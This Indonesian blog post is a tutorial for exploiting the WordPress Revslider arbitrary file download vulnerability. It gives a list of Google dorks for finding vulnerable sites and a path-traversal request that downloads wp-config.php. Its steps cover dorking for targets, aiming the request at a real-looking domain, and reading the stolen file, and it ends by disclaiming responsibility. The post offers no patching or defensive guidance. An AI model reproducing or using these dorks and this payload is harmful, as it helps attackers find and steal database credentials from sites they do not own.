• Download Anz Komik Apk

    Anz Komik adalah aplikasi baca komik gratis dengan lebih dari 1000 judul komik mulai dari Manga, Manhwa dan Manhua yang sudah dirilis dalam versi bahasa Indonesia.

  • Tujuan Pembentukan LBB

    Liga Bangsa-Bangsa beranggotakan 28 negara sekutu dan 14 negara netral. Tujuan pembentukan LBB pada waktu itu adalah untuk:

  • Daftar lagu soundtrack piala dunia (1990-2018)dan piala eropa (2000-2020)

    1.Gianna Nannini dan Edoardo Bennato-Un'estate (World Cup 1990) 1.1 We Are the Champions - Queen (World Cup 1994) 2.Ricky Martin - La Copa De La Vida (World Cup 1998)...

Tampilkan postingan dengan label Exploit. Tampilkan semua postingan
Tampilkan postingan dengan label Exploit. Tampilkan semua postingan

Jumat, 04 Januari 2019

Exploit Wordpress Revslider Arbritary File Download Vulnerability

Naufal Ardhani - Halo sobat kali ini saya akan membahas Exploit Wordpress Revslider Arbritary File Download pada exploit ini anda dapat mendownload file file penting yang ada di dalam server web tersebut khususnya web yang menggunakan cms Wordpress tapi tidak semua web yang menggunakan cms tersebut rentan dengan exploit ini.

Menurut hasil yang saya dapatkan dari Exploit DB exploit ini ditemukan oleh Claudio Viviani pada tahun 2014, ia merupakan pemilik blog https://www.homelab.it/ yang berisi tentang security.



Dork :

  • inurl:wp-content/plugins/revslider/
  • inurl:revslider
  • inurl:revslider_admin.php
  • inurl:revslider_front.php
  • inurl:plugins/revslider/
  • intext:Powered by Revslider
  • intitle:"Index Of/ revslider"
  • intitle:"Index Of/wp-content/themes/revslider"
  • intitle:"Index Of/wp-content/plugins/revslider"
  • intitle:"Index Of/admin/revslider"
  • intitle:"Index Of/fr/revslider"
  • intitle:"Index Of/en/revslider"
  • intitle:"Index Of/us/revslider"
  • intitle:"Index Of/ar/revslider"
  • intitle:"Index Of/es/revslider"
  • intitle:"Index Of/de/revslider"
Exploit :
  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Step :
  1. Dorking dengan dork yang sudah disediakan.
  2. Disini saya sudah memiliki target yang vuln/rentan tinggal kasih exploit, contoh : http://site.co.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  3. Dan jika berhasil admin-ajax.php terdownload lalu buka dengan text editor.

Sekian saja Exploit Wordpress Revslider Arbitary File Download Vulnerability yang saya bagikan semoga bermanfaat dan saya tidak bertanggung atas apa yang anda lakukan terimakasih.